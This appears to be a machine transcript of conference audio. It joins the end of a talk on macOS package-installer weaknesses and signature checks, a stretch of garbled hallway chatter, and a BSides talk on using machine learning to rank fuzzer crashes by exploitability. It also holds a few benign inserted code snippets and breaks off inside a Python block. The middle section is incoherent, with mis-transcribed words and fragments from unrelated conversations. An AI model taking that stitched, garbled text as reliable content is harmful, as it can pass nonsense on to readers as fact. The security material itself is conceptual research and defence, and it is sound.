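A hand-rolled pre-install version check of the kind being described might look like this — the app directory and VERSION file are invented for illustration:

```shell
#!/bin/sh
# Sketch of a do-it-yourself update check in a preinstall script.
# The location and format of the version marker are made up here.
cd "$(mktemp -d)"
mkdir -p Example.app && echo "1.2.0" > Example.app/VERSION   # prior install

NEW="1.3.0"
if [ -f Example.app/VERSION ]; then
    OLD=$(cat Example.app/VERSION)
    echo "updating from $OLD to $NEW"    # run the update branch
else
    echo "fresh install of $NEW"         # run the fresh-install branch
fi
```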

If this version exists, run these commands; otherwise run these commands. And then the BOM — it's not just the files that are being written; it can also specify that this is being updated or these files are being removed. So the package installer flow does support updates, but I do see more of the custom code written in the installer scripts: hey, this exists, blow away the directory, recreate it, copy the new files over — sort of their own self-cleanup. Do you think this stuff might be going away with Catalina, or do you see this staying around because it's really the only way to install stuff? I'm surprised how often I still saw this package install used for files that were just writing to the Applications directory, because everybody has migrated

towards the DMG volume drag-and-drop to the shortcut that's already in there. And so why go through this whole installation flow? I mean, that bypasses the whole receipt system also. There still isn't a good flow outside of this for getting things into Application Support, kernel modules, libraries. And so that's why Razer was a great example here: they're going through and installing mouse drivers on your system. You don't want those in /Applications; you need those tucked away in the Application Support directories. And so installer is really the only way right now to do that. It will be interesting, as SIP migrates deeper into rootless, migrates deeper into the macOS environment, to see if they start having

to have some installer privilege escalation or some other bypass to further lock these things down and restrict it to App-Store-only-files type thing. In terms of, like, remediating this sort of thing — oh, okay. Thanks. Sorry. So in terms of remediating this sort of thing and potentially identifying packages that are tampered with, is it basically checksums of files that blue team would have to deal with, or do you have other recommendations? Yeah, so there are signature checks. So if we go all the way back to Suspicious Package, you can see that, or pkgutil actually has a check-signature option: you give it the package file and it will check

the signature. So you can see who this was signed by — there's the command-line way to look at it. So you can check: is this signed by the company, the developer, that I expect it to be? And then you know either they did something bad or malicious, intentionally or accidentally, or it's been tampered with. Even if it's got a valid signature, if it's not signed by the developer you're expecting, that would throw up a flag for me. So the Praetorian people had a valid signature, but I don't expect my video conferencing software to come from Praetorian. If I did, I'm just asking for trouble. But then, for most of these, I don't have to tamper with the package — the package comes pre-vulnerable.
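For reference, the command-line signature check being described (macOS-only; the package name is a placeholder):

```shell
# macOS-only: prints the certificate chain the package was signed with,
# so you can confirm the developer is the one you expect.
pkgutil --check-signature VideoConference.pkg
```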

And so it's more, like, the protections as a developer are to do those checks. A lot of these, you know, they try to write a file, but I already wrote that file and so it fails, but they don't check the result of their directory create or their file create, and so it just continues on. Those commands fail, but since they're sort of in a batch mode inside this installer script, the installer happily continues through failures. If the last command fails, then the script fails, but as long as there's more commands to run, it's whatever the last exit code was that determines whether it

was a success or failure. So you can do those checks: capture the return result of mkdir, or before you go use a file, check that it is the user you expect to own it. And then you know that, at the very least, only that user could be attacking you in this, and not just any system or process on there that pre-wrote that file. Way in the back. auditd might be capturing those, it sounds like. Now, there might be, but when trying to build my own package and debug why I was failing, I was having a very hard time finding a place, and I had to do a whole bunch of touch and output to temp directories after every

single command, so I know where I got to within my script, because I couldn't find a place, like in the console logs or anything, that was showing me that. And I am at zero minutes left on my time, supposedly. But actually, I think I have five more minutes. I've short-sheeted myself. There is time. That's five minutes of applause, people. Thank you. I think we got four and a half minutes. How about this now, with one hand? How are you doing? Good. Good to see you. Same. You're back in the game. Yeah. Yeah. So since March, I went. So every five years per ISAC law and the dust grandfathered in, I get a five-week sabbatical. So I basically set it up so when I returned

from my sabbatical in March, I was out of the management game, and I have zero direct reports and I do strategic project delivery, which is like M&As, high-profile clients, like new logos that we really want to impress, or like we really messed up. Or it's like a super likely Goat app and I can have like five intern shadows or something. Thank you very much. Thank you. You're in Tokyo now? Last I heard you were still with VMware but not with the old department. So that was months, years? We left. What? We left. We didn't film the video. That's right. We'll do that later. Where's the connection? Here, here, here. Here's the microphone. The microphone.

I think I could exploit that. By the way, I have a blackboard of Spider-Man. I didn't see if that's where he is. - No, Synapse 2, it's fixed, it's the latest package, they now know ahead of time all the files. They still do start off with . But then they say if it's not in our predefined list of packages, don't execute it. - Okay, so that's good. But the software is . - Okay, I mean, to do this research, it's basically combed from - Test, test, yeah. Yes please. um Focused on security. I knew about this mortgage and I wanted to make it secure. You've seen them, right? Yeah. I gave you that part when I was a courtier

and then did a company for 15 years. I knew I wanted to pursue that. I was doing my website challenges and sharing shelves for my home directory, for my home system to other people. So basically what you just said was true. curious during that time Because people are like, oh, a package. Double-click it. And I'm like, oh, a package. Is that an archive? Can I look at it from a different way? Oh, a docx file? That really is it. I know it's a great XML file. It's basically the same idea. I use that, not this. But you get sort of freebies there when you're poking around and stuff. I think we're going to put you up.

- I think they would've moved. - I think we can talk more. So, um, - So that, um, checks all checks for ABI students, for that, um, so I can charge that student a second amount, but actually, I've done that. So, yeah, I could put it in something like a new order. - It's like at the no point, you know, the time, so it like, holds for the time. - Yeah, so that, um, got me bored to, you know, the check to see if it's, Good afternoon and welcome to B-Sides Las Vegas: Breaking Ground Track. We have Ezra and Guy going to give a talk on using machines to exploit machines, harnessing AI to accelerate

exploitation. But before we get started, we'd like to say thank you to our sponsors and volunteers who help make B-Sides what it is. And specifically, we'd like to thank Cylance, Microsoft, Robinhood, and the Paranoids. So take it away, guys. Thank you. Okay. Good afternoon, everyone, and welcome to our talk. We hope that this slot will not get you too drowsy. Hopefully everybody had something to drink after lunch or feels a bit more awake, and we'll try to make this, if not entertaining, at least plausible in a sense. Before we begin, there's a lengthy disclaimer that you're all required to read and sign off on. That's it. No, no, no. In all seriousness, I used to work for Intel, not any longer, which is why

you can see me crossed out at the bottom, and why I can make this joke and say you don't really have to read this anymore. But please, please read, because I still work for a Fortune 50 company. Someone has to. My name is Guy and this is Ezra. We're both co-organizers of the Tel Aviv BSides, which happens around June, and you're all very welcome to join us in sunny Tel Aviv. It's a pretty awesome BSides, just like here. And we often go and talk about topics that cross both of our domains of expertise, with this talk being one of them. We do have some experience, and we travel the world to some of the finest

conferences out there. We both believe that BSides Las Vegas is one of our most lovable, best conferences, one we love to attend and love to speak at, because this is the one that's most homey, most approachable, most community-driven. And this is something I wanted to point out. Before we begin, a bit of history about how we came about to this topic and about the talk that we're going to do today. Because it's funny, you remember where we were maybe a year ago? About a year ago, yeah. And we had a couple of days in San Francisco, and we were driving our car, our rental car, and we're like, wow, this year we have some very good content,

and we were talking about machine learning, and we have some amazing experiences, and it was like, what are we going to do next year? So last year we did a talk here, in this very same room, about machine learning and how you would hack machine learning. And we were trying to think about, okay, this is a good topic, this is something interesting which we both like. What can we do with it next? What's the next step? And that next step and that conversation led us here today, which is: how can we actually use machine learning to help us in our everyday life, in our jobs, of actually finding and exploiting issues in

various systems that we explore. So let me start with our problem and how it is related to our talk last year. Last year, our objective was to hack the hell out of machine learning. And when I'm talking about that, I'm not talking only about the algorithmic part and the adversarial networks. I'm also talking about finding vulnerabilities in the different frameworks that exist for different machine learning purposes. So we did what we researchers love to do the most, which is basically run a fuzzer. And this fuzzer started to generate thousands of crashes to analyze. And you can imagine that this is a good problem to have. Having a lot of crashes is good, but having a lot

of crashes brings us a small issue. Not all of those crashes are exploitable. Automation can do some good work, but we may miss some things. I mean, using heuristic approaches to find which of our crashes are exploitable with GDB works, but we may miss a lot of interesting stuff. On the other side, doing it manually is extremely expensive. Me as a researcher and my team of researchers can only go through a small amount of crashes. Like, imagine for every single crash we need to reproduce it, we need to open our GDB debugger, and we need to take a look at the entire flow to know if it was exploitable or not. And well, this doesn't scale at all. And when

we saw that it doesn't scale, we thought that our work would be mostly about building the model, because we had the crashes and we thought, well, we are going to be working a lot on building this model. And then we saw that the real problem was starting to gather the data. Because imagine now that we have thousands of crashes, but we don't even know what their status is. We don't know if they're good crashes, bad crashes, the same crashes. We don't know anything about them. So gathering data became a big problem. And then, then we struck the real problem, which is gathering good data. Because there's a big difference between data and good data. Like, if I have 10,000

crashes that are all going through the exact same path, it's the same as having a single crash. It's not relevant for me at all. So this was the problem. Finding what is the good data. Finding how we can sift through different crashes and try to understand how we can leverage them. So our problem statement became something like this. Can we, as researchers, generate a machine learning model that can help us with the crashes, help us find exploitable ones? And again, remember that our problem began with thousands of AFL crashes.
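The deduplication problem the speakers describe, thousands of crashes that all take the same path being worth no more than one crash, is commonly attacked by bucketing crashes on a hash of their top stack frames. A minimal sketch of that idea (the frame names here are invented for illustration):

```python
import hashlib

def crash_bucket(backtrace, top_n=5):
    # Bucket a crash by hashing its top stack frames: crashes that
    # take the same path collapse into the same bucket.
    key = "|".join(frame for frame in backtrace[:top_n])
    return hashlib.sha1(key.encode()).hexdigest()[:12]

# Two crashes through the same path, one through a different path.
a = ["memcpy", "parse_chunk", "read_file", "main"]
b = ["memcpy", "parse_chunk", "read_file", "main"]
c = ["strlen", "log_line", "main"]

buckets = {crash_bucket(bt) for bt in (a, b, c)}  # two distinct buckets
```

With 10,000 AFL crashes, triaging one representative per bucket instead of every crash is where most of the time savings come from.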

So, to summarize that and kind of like put the focus, put the spotlight on our problem is we have a team of researchers. In this case, my team had about five researchers. Five researchers can go through, I don't know, maybe 10 to 20 crashes a day in a very good day. We have 10,000 crashes. This does not scale. This is not the solution. And more than that, in order to look at those 10,000 crashes, usually you'll see a lot of crashes that are duplicates of each other. And that means you're wasting a lot of time in finding out that they are duplicates of each other. So the big question is, can we use machines to

help us sort out the exploitable paths, or the exploitable crashes, that we actually want to look at, and invest the time and resources that we have into where we can actually drive impact. So that was the big research question. And the way we tried to tackle it is to see if we can build a machine learning model that would outperform, would actually be better than, the best known alternative, which is an open source project called exploitable. Because the name is so confusing, I've underlined it. And every time that I refer to the open source project, it says exploitable with an underline. And if I say exploitable any other way, it means just exploitable. So this talk will not... show you how to

exploit the next zero day. This talk will not be releasing new tools and methods in order to exploit something new that you haven't seen before. But what we are going to show you in this talk is how to utilize, how to build such machine learning models and see where they can help you and where they cannot and try to differentiate between the two cases and walk you through the research path that led us from an idea to something that actually works and the hiccups that we found along the way. We do want to say beforehand we really can't trust our results and we'll explain in the end why we can't trust the results. But you

should always keep a very specific eye on the details because the details are what really, really matters. So we'll be happy to expand after the talk if someone has specific questions or issues. So, I'm not going to do this 101 into machine learning, what it is, but I'm going to give you a very high-level overview of how machine learning actually works. So, machine learning has a couple of different paths when you're building a machine learning model or running a machine learning model. The first step is that you have to give it the data, and in order to give it the data, you have to collect the data from whatever sources you get your data from,

and then you have to... extract from that data the pieces of information that you want your machine learning model to look at. For example, if you're looking at the log file, a log file is a large piece of data, maybe, I don't know, one million log lines. But the machine learning is not really reading one million log lines. You have to extract from each line the specific items that you want the machine learning to look at. The timestamp, the host name, the alert level, the stuff that you want it to actually look at. This is called feature extraction. So we have the data, and we have to filter out the specific pieces of information that

you want to look at. And then we provide the model with that information and the model will go through an iterative phase where it will train on that pieces of information and will actually fit the model to the information that it saw. And this is a very important distinction to make. When a machine learning learns something, it learns on basis of stuff that it had seen. It does not learn on stuff that it has never seen before. Therefore, when you are hearing someone saying, "I have a machine learning model. I trained it on dataset A. It's now capable to find out anything and everywhere in the world," it's probably not true. Keep an eye on

the details. The last point is that after the model has already learned the information, it internalized that information, the next level is to make predictions. So if I have a machine learning model that learned how to distinguish between cats and dogs, so it learned about a lot of features of cats and dogs, and now I can give it an image that it has never seen before, and it will give me a prediction. Is it a cat or is it a dog? And the way that it works, it will say, "Okay, I've never seen this picture before, but it looks very similar to all of the pictures of cats that I've seen before, so this is

probably a cat." And the prediction would be something like, "This is a cat, 0.7 probability." Okay? So this is how machine learning usually works. Machine learning is not magical. I know some people think it is. It's not. It's not magical. It's not difficult. It's not complex. At least when you're starting out, and then you make a lot of fine-tuning and nuance and stuff like that. In the end, you can think about it, there used to be a show, what was the name of it, the incredible, the mystery machine, Scooby-Doo. And at the end of each show, they would go up to the villain and they would unmask him and show, ah, it was you

all along, you meddling kids. Whenever someone says AI or machine learning, pull off the hood, and you'll see that it's linear regression. Okay, so it's not difficult, it's not complex, but in the end it's a tool that fits some sorts of problems and does not fit other types of problems. And it's a very good buzzword, just like other buzzwords we all like, like blockchain and cyber and zero trust and stuff like that. So it's very good to keep it in your talks, and the general rule of thumb is: it's machine learning if you see code, it's AI if you see a presentation. Keep an eye on the details. So, we'll give you an example. When you write a talk and you submit to a conference, you don't say you're

doing a machine learning talk, you are hacking AI. You get a much better acceptance rate that way. But in the end, everybody that says AI really means machine learning. Or statistics. Or linear regression. Or heuristics. In the end, it all comes down to the same thing. So, it's not that we're not on board the hype train, just that we have a different look from the inside. So, what is machine learning good for, if I've already described all the stuff that it isn't? It's very good at finding patterns. And for us, as researchers, trying to find patterns, it's a good tool to have in our arsenal. Because if I need to scan one million log lines to find some patterns, obviously I'm not going to do it manually, having it run on my

screen, trying to catch that something is misformatted. I'll give it to a tool like grep, which will find it much better than myself. The same way, machine learning can find patterns where we as humans can't really see those patterns. Another thing that machine learning is very good at is looking at variable A, variable B, and variable C, and saying these variables correlate together in some sort of way. And if you can look at that information, sometimes you can find new links, new opportunities that you haven't thought about before. So if you feed it the right information and you find the right correlations, you can learn something new about your data set that you didn't know beforehand. And in the end, something that you can do with machine

learning, which is a bit difficult to do with a bash script, is you can abstract a problem, throw it at machine learning, and see if something comes out the other end. And if something does come out the other end, it means that there's some sort of structured information there that the machine learning was able to catch on to, which means that you can catch on to it, which means that you found something new that you didn't know before. And this is kind of what we were going for here. We knew how to find exploitable patterns in code. We didn't know how to write programs that will find exploitable patterns in code. So we just abstracted the problem away

and called it machine learning and said, "Look, this is something that is exploitable. I know it's exploitable. You find out why and tell me." So this is what we tried to achieve. We wanted a system that we will give it some input and it will tell us this is exploitable and why. Okay. Part of the problem is that machine learning is given predictions based on information that it has seen in the past. So if I give it some sort of a new exploitable path that it has never seen before, it will not be really able to tell me that this is exploitable. And this is something that we kind of took into account. So, okay, there are 80% of the exploits out in the world come out of

the same root causes. So if you train the machine to find these root causes, we will cover 80% of the world. And the other 20% of the world is something that we've never seen before and requires manual work, and we might miss it with this system. And you know what? That's fine. That's perfectly fine. Because if I can go over 10,000 crashes and throw away 8,000 of them because they're all the same thing, I saved a lot of time. I saved a lot of resources. And I'm very happy with that result. What we try to do is to create this dataset, test it, validate it, and to make sure that we actually have a working, I won't call it product, but at least a tool.

A tool that you can use in order to better facilitate your research activities. In order to do so, we first have to teach the machine, or make it understand, what a crash is, what it needs to focus on, and how we would go about describing those issues. So, before we start describing what the machine does, we'll start with what a human does. And with that, Ezra. So, I'm going to tell you a little bit about my life. I love speaking about my life. Particularly, my morning life. Or how I like to call it: when I arrive at the office. But actually, when I arrive at the office, it starts with the night before. The night before, I set up some of my fuzzers to run

on certain applications and left them running in the background. I went home because I'm lazy and I need sleep. The next morning, I arrived at the office extremely early, around 11 o'clock, and I drank my first cup of coffee, because if not, I cannot continue. Afterwards, I started seeing what the results of that fuzzing session were. I open the debugger, I load into GDB the core dumps from the crashes, and I start to analyze. Based on my experience, based on what I had seen before, based on the paths that I had seen before and the way I had analyzed crashes in the past, I classify those crashes as either having the potential to be exploitable or not.

And afterwards the real fun starts, which is developing a proof of concept for the crash and trying to actually exploit it. The fun part of my day, week, year, whatever. What we have seen until now, what we have talked about until now, is like a classical data problem. Because I have multiple crashes and, based on experience, I expect a result with a certain degree of probability. So if we are doing this with machine learning, the machine learning does not need sleep, nor coffee, which is probably why they will start a revolution eventually. The pre-processing phase is the same thing as me opening it with a debugger and extracting the different registers and the different data that I need to perform my work. And then the

machine learning analyzes the data with the same experience that I have. We train the model to learn from old stuff, from experience. We manage to transfer this knowledge, and it makes the same predictions. And afterwards it will probably return it to me to develop the proof of concept. We are still not at a place where the machine learning will be able to generate the payload, to generate a nice exploit proof of concept.
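The pre-processing phase described here, opening the crash in a debugger and pulling out the registers, can be sketched as a simple parse of a GDB `info registers`-style dump. The dump text and the regex below are approximations for illustration, not the speakers' actual pipeline:

```python
import re

# Match lines like "ecx   0xbffff6a4" (name, then hex value).
REGISTER_RE = re.compile(r"^(e[a-z]{2})\s+(0x[0-9a-f]+)", re.M)

def extract_registers(dump_text):
    # Pull register name -> integer value pairs out of a
    # GDB "info registers"-style dump (format approximated here).
    return {name: int(val, 16) for name, val in REGISTER_RE.findall(dump_text)}

# Hypothetical crash-dump fragment.
dump = """eax            0x0
ecx            0xbffff6a4
eip            0x8048432
"""
regs = extract_registers(dump)
```

The resulting dictionary of register values is exactly the kind of feature vector that gets fed to the model in the next step.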

So in order to train our model, the first thing that we needed is something that would teach it experience, or give it experience. And we looked around the internet, we looked around our office, we looked around our friends, and we asked everyone: do you have a very good data set of a couple of exploitable crashes where you know what the exploitable path in them is? So you know that this program crashed, and you know that if you use this payload, you will get a buffer overflow at this address. And the answer was, yeah, I have lots of crashes. But no, I don't really know if it's exploitable or not. So the big problem

was not that we weren't able to get data. We wanted good data. We wanted data where we would know that it's either really exploitable, or that someone took a look at it and it's not exploitable. Because all of the other pieces of data, which is, yeah, it might be exploitable, it might not be exploitable, don't really help us teach the machine anything. OK. Sorry. So we searched around, we talked to people, and finally we stumbled upon DARPA's Cyber Grand Challenge. And the reason that this really came as a huge bonus for us is because they had already done all of that work for us for that competition. So I will not go into details about what the

DARPA Cyber Grand Challenge was. However, what they do provide is 632 different exploitable crashes that come with a nice little wiki that says, exactly, for each and every binary, what kind of exploitation technique you can use against that binary. And they already wrote the exploits. So now we have a data set where we know, for each and every binary in that data set, that it is exploitable, and we know how exactly it's exploitable. So now we have something that we can use to teach the machine. So we took that data set and we ran it through that open source exploitable, and the open source told us that out of those 632 cases, 607 are

definitely exploitable, 12 are probably exploitable, and it didn't have an answer regarding the other 13. So, this is our baseline. That means we know that all 632 are really, really exploitable, and the open source package only found 607 to be exploitable. So, this is the baseline that we are going to measure ourselves against. Can we do better than that? In order to do that, we looked at what kind of information we can use, and we have tons of information. We can look at the registers, we can look at the addresses, at the stack itself, we can look at the heap, we can look at the control flow information, we can look at a lot of different pieces of information. And after we analyzed a lot of that, we said,

screw it, we don't know. We'll just take something simple and see if it works. And if it doesn't work, we'll make it more complex. But let's start small. So we started with just the regular registers: EAX, EBX, the pointers and segment registers, stuff like that. So as our first step, we take the crash dump. Then we extract the registers from the crash dump. And we fed those registers, for each crash, to the machine learning to teach it something. And we'll talk a bit about how we taught the machine. So, we created a pipeline that just ran the binary. The binary crashed. We captured the crash logs, the crash dump. We analyzed the crash dump

and we took that crash dump and forked it into two different processes. The first one took it and ran it against exploitable, and the other against the machine learning under test. Okay? So we can compare those results. And then we hit a problem. We hit a lot of problems. This is the first one I'm going to describe, and maybe someone can see the problem right from this graph. This graph is just showing the value histogram. Sorry, not histogram. The value spread for the ECX register. And what you can see here is that if you look at the value of the ECX register over the 632 different runs of the programs, you see a lot of times it's a very low value. Sometimes it's

a high value. And not often is it somewhere in between. What that means is that most of the time when we are running this and we get a crash, we'll either have a very low value or a very high value. So what do low value and high value mean here? A register holds a piece of information. The ECX register usually holds one of two types of information. Either it's a value for computation, like 1+1, 2+3, usually a very low value, or it's an address. An address is usually something which is very large, because of the way an address is structured if you translate it into an integer value. So either the ECX is holding an

address, or the ECX is holding a value. So that's kind of what you see in this graph. And these two cases are dramatically not the same. Because if I have a crash and ECX was holding an address, this is something interesting of type one. And if we had a crash and it held only a value like 5, it's interesting, but to a wholly different degree. So we needed a method, a way to differentiate between the two cases. Because when we tried to teach the machine learning model this, it just got really, really confused, because it didn't know how to differentiate them. So what did we do? So there are a couple of different techniques for how to circumvent this problem. The technique that we finally decided to

go with is something called binning. Binning is to take your value space and just chop it up into blocks. You can do it uniformly or non-uniformly. But in the end, we just took the easiest route. We are lazy, as Ezra mentioned. We took the entire range and split it into 10 different blocks. And then most of our values fell either in the first block or in the last block, and very uncommonly some were in the blocks in between. But once we did that, we could teach the machine: OK, if you see something in the first block, this is type A. And if you see something in the

high block, this is type B. It made it much easier for the machine to understand and actually analyze the value of the ECX register in each crash. Because we don't really care about the value. We just care about the different cases.
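The binning step can be sketched in a few lines: chop the 32-bit value space into 10 uniform blocks, so small computational values land in the first block and address-sized values land in the high blocks. This is a minimal sketch of the idea, not the speakers' exact code:

```python
def bin_value(value, lo=0, hi=2**32, bins=10):
    # Chop the value space into `bins` uniform blocks and return
    # which block (0 .. bins-1) the value falls into.
    width = (hi - lo) // bins
    return min((value - lo) // width, bins - 1)

bin_value(5)           # small computational value -> first block (0)
bin_value(0xbffff6a4)  # stack-address-sized value -> a high block (7)
```

Feeding the model the block index instead of the raw register value is what lets it separate "holds an address" from "holds a small value" without getting confused by the huge numeric range in between.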

So, the first machine learning model that we tried to use, maybe a small introduction for that. Usually when people are discussing machine learning, they mean a very specific type of machine learning, and that is neural networks. This is the most common case. Neural networks are great, but we obviously couldn't use them. And I say obviously, because it's really not obvious. So one of the things where I said you really need to mind the details is that in order to use this type of machine learning, or more advanced models, you have to tell it something about the good cases, but also about the bad cases. So you have to teach it a crash

that is exploitable, but also teach it about a crash that is not exploitable. And this is a big problem, because we have a big data set, well, not that big, but a pretty big data set, 632 crashes that we know are exploitable. But we don't really have the other kind. We don't have a crash that we analyzed and we know for certain that it's not exploitable. And this is also a very tough cookie, because in order to validate that some crash is not exploitable, you still need to invest time and effort and resources to analyze it, to have someone sign off on it and say, "No, this is not exploitable." And usually it comes with

a mild guarantee: I don't think I can exploit this. Maybe it's exploitable by someone else. So we can't really know if something is not exploitable. We know when it is exploitable, because we know how to exploit it. But we are not really sure it's not exploitable by the mere fact that we didn't find a way to exploit it. It's not the same thing. So what we chose to do is to go to a different branch of machine learning algorithms, ones that take a single class. A single-class algorithm just says that you only know one thing about the problem. You don't have a lot of types of information about the problem. So what we do

here is, we know all of our data set actually fits into the same class. We know it's exploitable. Remember, we have the wiki. And now we will use these types of machine learning algorithms in order to teach it something that we already know. So the first type of algorithm is called one-class SVM, or one-class support vector machines. And very hand-wavingly, I will explain how it works. So imagine we have these black spots and these white spots, and we are trying to find a line that will separate the two groups from one another. Okay, this is what the machine learning does. It will try to find the right equation for this line, the right parameters

for the equation for this line, that will give us the best separation between the white dots and the black dots. So the green one, here it's marked H1, is a very bad separation. We all see it's a very bad separation because it doesn't really separate them. So what the machine learning algorithm will do, it will change the parameters and we skew it a bit. Now we have H2, the blue line. So this is a good separation because all the black points are on one side and all of the white points are on another side. But mathematically speaking, it's not the best separation that we can get because if we keep changing it until we have

H3, the red line, the average distance of each spot from the line will be smaller for the red line than for the blue line. So what I'm trying to say here is that even though the blue line is a good separation, it's not the best we can do. So usually, with machine learning algorithms, we're trying to find the optimal separation between these two classes, two groups of information. So this is what we did with SVM. And just to reiterate what we know: we know that the entire 632 points are all exploitable, but we took only 609 of them, those that the open source exploitable found to be exploitable, and we

use this as our common base. We taught the SVM that, look, all of these points belong into the same group. Now, check out the rest of the points and tell me, do they belong to that group or not? So you can imagine it like this. We took those groups, we clustered them together, and now for each new group that I'm adding, I can calculate the distance between that new group, between this new sample and the group that I had from before. And if it's close to the cluster, it's exploitable. And if it's far away from the cluster, it means that it's not exploitable. So this is what we've done. And we got pretty good results.
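The cluster-and-distance intuition described above can be sketched in plain Python: "train" on exploitable samples only, remember the cluster's centre and radius, and treat any new sample inside that radius as belonging to the exploitable class. This is a toy stand-in for the actual one-class SVM, with made-up 2-D feature vectors:

```python
import math

def centroid(points):
    # Component-wise mean of the training points.
    dims = len(points[0])
    return tuple(sum(p[i] for p in points) / len(points) for i in range(dims))

def fit_one_class(train_points):
    # Train on the exploitable class only: remember the cluster centre
    # and the largest training distance as a crude decision boundary.
    c = centroid(train_points)
    radius = max(math.dist(c, p) for p in train_points)
    return c, radius

def predict(model, point):
    c, radius = model
    return math.dist(c, point) <= radius   # True -> looks exploitable

# Hypothetical feature vectors for known-exploitable crashes.
train = [(1.0, 1.0), (1.2, 0.9), (0.8, 1.1)]
model = fit_one_class(train)
```

A new crash whose features sit close to the exploitable cluster comes back `True`; one far away comes back `False`, mirroring the "close to the cluster means exploitable" description in the talk.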

From those 23 records that exploitable wasn't sure about or didn't know about, 23 of them we found to be exploitable and two more were probably exploitable. So we really outperformed the open source package, just by looking at the same pieces of data from a different perspective. And that wasn't enough. We wanted to test a couple of other algorithms to see, at least, the lay of the land. Can we find a better algorithm, something more robust? Again, we really wanted to increase our own trust in the model, because we don't really trust it. So another model is called cosine similarity. Cosine similarity just means that we are going to measure the cosine of the angle between two points. So

here in this graph, we have two points, a burger and a sandwich. Obviously, they are kind of the same class, but not really the same thing. Is a burger a sandwich? I'm not sure if it translates well to English. I don't think that a burger is a sandwich. And then we calculate the cosine distance between them. And if you're very, very interested, here's the formula. You don't really need it. And we looked at that model and we used it to calculate the distance.
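A minimal sketch of both flavors, the plain cosine similarity and the centroid variant discussed next; all the vectors here are invented:

```python
# Cosine similarity is the cosine of the angle between two vectors:
# 1.0 means same direction, 0.0 means orthogonal. Vectors are invented.
import math

def cosine_similarity(a, b):
    dot = sum(x * y for x, y in zip(a, b))
    return dot / (math.sqrt(sum(x * x for x in a)) *
                  math.sqrt(sum(x * x for x in b)))

burger, sandwich = [3.0, 1.0, 0.2], [2.5, 1.2, 0.3]
print(round(cosine_similarity(burger, sandwich), 3))

# "Centroid" variant: compare a new sample against the mean vector of a
# whole cluster instead of against each member separately.
cluster = [[1.0, 2.0, 0.1], [1.2, 1.8, 0.2], [0.9, 2.1, 0.1]]
centroid = [sum(col) / len(cluster) for col in zip(*cluster)]
sample = [1.1, 2.0, 0.1]
print(round(cosine_similarity(sample, centroid), 3))
```

Because only the angle matters, two samples with very different magnitudes can still score close to 1.0, which is exactly why it behaves differently from a straight-line distance.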

And we got other results. And here, we got 16 more samples to be exploitable. We're still outperforming the open source package, but not by much. And then we changed the model from linear cosine similarity to centroid cosine similarity. I know it sounds scary, but all it means is that instead of looking at the distance as a straight line, we are looking at it on a sphere; it's the spherical distance between points. So when we changed that algorithm, suddenly we could cluster more points together, just by looking at how far away those points are on a sphere versus how far away they are in a straight line. Again, we outperformed the open source package by a significant amount. We also played with how many

registers we are feeding into the machine learning, to see: do we really need all of those registers to get those results? We started with nine registers and we got 65%, which is good. And we upped it to 15 registers; now we got 87%. So we fed it more information than it had previously, and we got better results. Not very surprising. The last model is called XGBoost. XGBoost is probably the most similar to neural networks, which people are very familiar with. We took 80% of the data, used it for training, and kept the other 20% for test and validation. And that is actually not very useful. It's useful

just in one parameter. We found out that we have between 95 and 99% accuracy for this type of model, for XGBoost. It means... sorry. Yeah, it was bullshit. So we looked at that and said, okay, we have 99% success rates for this. It just doesn't make sense. And then we looked at the data and we found out that we were pretty much lying to ourselves most of the time. Because if we look at the data, remember we had 632 crashes, and out of them, 609 we all agreed were exploitable. And that means that if we only guessed exploitable, we would be correct 96% of the time, which mainly means that there's no randomness involved. There's nothing to learn. If I ask

my three-year-old son to just keep saying no, no, no, no, he would be correct some of the time. Really, we didn't learn anything useful. However, XGBoost does give us something else, and this is called the decision tree. What the decision tree does is take each parameter that XGBoost is basing its decisions on and put it into a tree structure. And that way you can visualize which parameters were more important for XGBoost's decisions. And that gives you insight into the parameters that have the most impact in your dataset. Which registers are more important than others? Which data points are more interesting to look at than others? So just to walk you through it. If you're looking at EBP, again, is EBP

in bin 1? Assume that it is. Is ESI in bin 1? Assume that it is. Is ES6 in bin 1? Yes, it is. Then we have 16 records that fit this filtering criteria. Out of them, 7 are exploitable, 4 are probably exploitable, and 5 are unknown. So this gives you an insight into the way that the data is structured. So let's look at it in a different way: EBP is not in bin 1 and ESP is not in bin 2. If that is true, then 571 records are exploitable, which means that now we have a very good rule of thumb. We'll just look at the crash, and if EBP is not in bin 1 and

ESP is not in bin 2, we now know it's exploitable. Success. Now we can profit. Or, as Ezra so eloquently put it before, bullshit. This means absolutely nothing, because that's just the way the data is structured for those samples, and we used a model that needs input about the other, complementing side of the information, which is: what does a non-exploitable crash look like? Which it never saw. It didn't train on any non-exploitable path, because we don't have that data. And that means that even though we have that decision tree, it didn't really teach us anything useful. And this is something where you really have to keep your eye on the details. When someone gives you statistics out of those machine learning models,

statistics are great, and they really describe the way that that machine learning model was run and trained, but they do not give you any kind of insight into the data it was trained on. So if you don't know what the training data was, what its statistical properties were, anything about it, then looking at the results out of context, you just get that: results out of context. Just like I got a 99% success rate. It means absolutely nothing. To conclude this experiment, or this journey that we took with machine learning: yes, we can take the same kind of samples and compete against the exploitable open source package, and we can outperform it. But the open source package knows how to deal with instances from the real

world. Our machine learning model has no idea about the real world. It just knows those 632 samples that it saw. If we try to feed it new information, new pieces of information it never saw before, will this hold true? Will it still find stuff to be exploitable when it isn't, or when it is? We actually don't know. We don't have enough information to make those decisions. But we believe, we have at least a gut feeling, that this is true. You can think about the open source package as a set of heuristics that describe a set of rules, and if you follow those rules, you will know whether something is exploitable or not. Machine learning does the same thing. It describes another set of rules that,

if you follow them, will tell you whether something is exploitable or not. What we're trying to say here is that our model is probably not well trained enough to be useful in a real world scenario. But if someone wants to take it and train it, or take a different path and train it, they will still probably get very good results, probably better results than the open source package. So you can build this yourself. You don't need a mathematical background. You don't need a data science background, which is a common misconception. In order to build machine learning models, you probably need to know Python. In order to write new machine learning algorithms, you probably

need a PhD. It's not the same thing. So don't be afraid. Go ahead, pick your favorite data science package, talk to your favorite data scientist, ask some advice, and build it. It's not that difficult. It's not that hard. It probably burns some CPU hours and that's it. You will have some results. You'll need experience to interpret them. But the way that we gain experience is by hacking things together and trying them out. And if you want our white paper, the white paper describes everything that we've discussed, but also gives you references and tools that we've used. I'll step aside. Okay. So in conclusion, machine learning in the end is very good at finding patterns that humans are not very good at finding.
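Two of the pitfalls called out above, the always-guess-exploitable baseline and the too-convenient decision-tree rule, fit in a few lines of plain Python. The 632/609 split is the talk's; the binning scheme behind the rule is assumed:

```python
# The class-imbalance trap: with 609 of 632 crashes labeled exploitable,
# a "model" that always answers "exploitable" already looks ~96% accurate.
total, exploitable = 632, 609
baseline = exploitable / total
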